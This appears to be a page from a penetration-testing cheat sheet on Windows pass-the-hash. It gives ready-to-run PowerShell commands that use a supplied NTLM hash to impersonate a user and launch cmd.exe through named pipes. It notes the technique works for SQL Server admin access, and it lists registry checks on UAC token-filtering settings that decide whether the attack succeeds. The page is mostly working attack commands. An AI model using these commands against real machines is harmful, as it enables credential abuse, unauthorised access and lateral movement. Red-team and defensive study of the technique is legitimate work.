Comment on page



Impersonate a user with Pass-the-Hash for local actions (network authentication does not work with Impersonation Token, only with Delegation Token):
PS > Invoke-ImpersonateUser-PTH -Username snovvcrash -Hash fc525c9683e8fe067095ba2ddc971889 -Target localhost -Domain . -PipeName mypipe -Binary C:\Windows\System32\cmd.exe -Verbose
PS > Invoke-SharpNamedPipePTH -C "username:snovvcrash domain:{megacorp.local|localhost} hash:fc525c9683e8fe067095ba2ddc971889 binary:C:\Windows\System32\cmd.exe"
Can be used for authenticating in SQL Server management tools (%PROGRAMFILES(X86)%\Microsoft SQL Server Management Studio 18\Common7\IDE\Ssms.exe) and accessing DBs with SQL admin hash, for example.

PtH Notes

User Account Control

LocalAccountTokenFilterPolicy & FilterAdministratorToken

Property Name
Property Path
If LocalAccountTokenFilterPolicy exists and is set to 1 (doesn't exist by default), remote connections from all local admins are not affected by UAC and PtH will succeed:
PS > Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\" -Name LocalAccountTokenFilterPolicy
If FilterAdministratorToken exists and is set to 1 (doesn't exist by default), builtin local admin account (RID 500) is affected by UAC and PtH will fail:
PS > Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\" -Name FilterAdministratorToken
Last modified 3mo ago